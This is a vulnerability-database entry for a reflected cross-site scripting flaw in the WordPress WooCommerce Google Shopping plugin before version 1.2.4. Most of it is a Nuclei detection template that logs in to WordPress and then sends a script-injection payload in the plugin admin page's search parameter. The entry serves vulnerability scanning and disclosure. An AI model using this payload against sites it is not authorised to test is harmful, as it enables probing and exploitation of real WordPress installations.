elex-woocommerce-xss: WordPress WooCommerce Google Shopping < 1.2.4 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WooCommerce Google Shopping | POC: 已公开

漏洞描述

WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and executing it in a logged in admin context.

PoC代码[已公开]

id: elex-woocommerce-xss

info:
  name: WordPress WooCommerce Google Shopping < 1.2.4 - Cross-Site Scripting
  author: dhiyaneshDk
  severity: high
  description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and executing it in a logged in admin context.
  reference:
    - https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 2
  tags: wp-plugin,xss,authenticated,woocommerce,wpscan,wordpress,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009db46e522519c58f1f25bb415c2c208a1ccb4b2a65ab75df4b3c36c031235c96022100818a0e68dd700d92654c0bab2df860043ed082b5e0b0e8b5036e8f6963c4c40d:922c64590222798bb761d5b6d8e72950